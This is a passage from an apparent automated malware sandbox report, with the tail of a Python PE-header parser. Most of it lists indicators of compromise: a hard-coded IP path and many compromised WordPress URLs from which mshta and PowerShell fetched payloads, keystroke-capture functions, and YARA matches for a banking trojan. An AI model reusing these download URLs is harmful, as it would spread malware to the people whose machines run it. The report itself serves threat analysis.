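    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 26 > len(data):  # signature + file header + optional magic
        raise ValueError(f"e_lfanew 0x{e_lfanew:x} points past the data")
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    (machine, n_sections, timestamp, _sym_ptr, _n_syms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt_magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    return {
        "e_lfanew": e_lfanew,
        "machine": MACHINES.get(machine, f"0x{machine:04x}"),
        "sections": n_sections,
        "timestamp": timestamp,
        "compiled_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).isoformat(),
        "optional_header_size": opt_size,
        "characteristics": characteristics,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "format": OPT_MAGIC.get(opt_magic, f"0x{opt_magic:04x}"),
    }


if __name__ == "__main__":
    for key, value in parse_pe_headers(build_sample()).items():
        print(f"{key:22} {value}")
```

The TimeDateStamp the parser recovers (0x61f3fa91) falls on the same day as the response's Date header, about six hours earlier, which fits a payload rebuilt shortly before distribution. The "PE file contains an invalid checksum" finding in the Signatures list refers to the CheckSum field deeper in the optional header, which this parser does not read.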
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
Source: Joe Sandbox View IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View IP Address: 104.131.62.48 104.131.62.48
Source: unknown Network traffic detected: IP country count 15
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se
Source: mshta.exe, 00000004.00000002.436735526.00000000003C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414890461.0000000003572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.html
Source: mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlA(
Source: 80_513972285.xls.0.dr String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlB
Source: mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlC:
Source: mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlEtrM
Source: mshta.exe, 00000004.00000003.415189643.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlMuzL
Source: mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlO(
Source: mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlWinSta0
Source: mshta.exe, 00000004.00000002.434904863.00000000002EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.432627473.00000000002E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlXtrP
Source: mshta.exe, 00000004.00000003.418218977.0000000002B9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlfunction
Source: mshta.exe, 00000004.00000003.416857633.0000000002B95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlhttp://91.240.118.168/qqw/aas/se.html
Source: mshta.exe, 00000004.00000002.434814870.0000000000290000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlmshta
Source: mshta.exe, 00000004.00000003.432720286.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415279373.0000000000389000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.436709573.0000000000389000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.htmlv1.0
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.png
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/qqw/aas/se.pngPE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs-construction.com/wp-
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs-construction.com/wp-admin/JJEf0kEA5/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs-construction.com/wp-admin/JJEf0kEA5/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://flybustravel.com/cgi-bin/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://flybustravel.com/cgi-bin/2TjUH/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://flybustravel.com/cgi-bin/2TjUH/PE3
Source: powershell.exe, 00000006.00000002.677511514.00000000039CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jeffreylubin.igclout.com
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jeffreylubin.igclout.com/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jeffreylubin.igclout.com/wp-admin/vzOG/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jeffreylubin.igclout.com/wp-admin/vzOG/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://kuyporn.c
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://kuyporn.com
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://kuyporn.com/wp-content/XS
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://kuyporn.com/wp-content/XSs5/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://kuyporn.com/wp-content/XSs5/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://wallacebradley.com/css/Yc
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://wallacebradley.com/css/YcDc927SJR/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://wallacebradley.com/css/YcDc927SJR/PE3
Source: powershell.exe, 00000006.00000002.670395063.00000000003E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000002.670395063.00000000003E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: mshta.exe, 00000004.00000003.432498297.0000000003536000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437126353.00000000035CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com
Source: mshta.exe, 00000004.00000003.432412944.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415021403.00000000035C9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431896244.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431603651.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.431688138.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437362266.0000000005A68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437239734.000000000409B000.00000004.00000010.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.437126353.00000000035CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://algzor.c
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://algzor.com/wp-includes/g
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://algzor.com/wp-includes/ghFXVrGLEh/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://algzor.com/wp-includes/ghFXVrGLEh/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bluwom-milano.com/wp-con
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bluwom-milano.com/wp-content/FEj3y4z/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bluwom-milano.com/wp-content/FEj3y4z/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://elroieyecentre.org/cgi-b
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://elroieyecentre.org/cgi-bin/l42slgmf8nBpUYsb/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://esaci-egypt.com/wp-inclu
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://esaci-egypt.com/wp-includes/W7qXVeGp/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://esaci-egypt.com/wp-includes/W7qXVeGp/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://grupomartinsanchez.com/w
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://grupomartinsanchez.com/wp-admin/QpFDJPMY49/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pcovestudio.com/wp-admin
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pcovestudio.com/wp-admin/c3zgRi2wXwCbdSD3iz/PE3
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://thaireportchannel.com/wp
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/
Source: powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://thaireportchannel.com/wp-includes/KaWZp0odkEO/PE3
Source: powershell.exe, 00000006.00000002.677511514.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.676191632.0000000003821000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\se[1].htm
Source: unknown DNS traffic detected: queries for: kuyporn.com
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv, 9_2_10012C30
Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.168
Source: mshta.exe, 00000004.00000002.434924168.00000000002FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415189643.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: mshta.exe, 00000004.00000002.434924168.00000000002FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415189643.00000000002FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 9_2_1001B43F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 11_2_1001B43F
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud

Source: Yara match File source: 17.2.rundll32.exe.330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.28f0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2890000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2810000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2280000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3060000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2340000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2130000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2860000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3e0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2280000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2170000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2100000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2830000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.330000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e10000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27a0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.3150000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.610000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23f0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e00000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2080000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2130000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.28a0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.440000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.26d0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.6c0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.31c0000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.26b0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.630000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2840000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3190000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2870000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.430000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.28c0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2160000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2740000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.460000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.27a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2730000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.4f0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2860000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2340000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.26d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2950000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.470000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2890000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2810000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3030000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23c0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.4f0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2dc0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4f0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.28f0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2950000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2740000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.23f0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3030000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.4c0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3160000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e10000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.660000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2870000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2080000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2490000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.630000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ed0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.27c0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e00000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3190000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2890000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2700000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2170000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2890000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.672129305.0000000000460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565576249.0000000002841000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614471421.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510608388.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565412374.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.564937807.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672206410.00000000004C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672542934.00000000023C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675105738.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.509691983.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672233162.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.671351696.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614263255.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.671971939.00000000003E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514065714.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613086830.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.672276729.0000000000611000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614545776.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510373196.0000000002890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510260153.0000000002740000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613891474.0000000002170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.613342038.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565506727.00000000027A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.567895594.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675067684.0000000003190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614325624.0000000002950000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.614438771.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510667014.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565439888.0000000002701000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510425143.00000000028C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565551248.0000000002810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.565698294.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510010458.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.509922920.0000000002080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.514698978.0000000000471000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510517753.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.510176839.00000000026B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.568150198.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
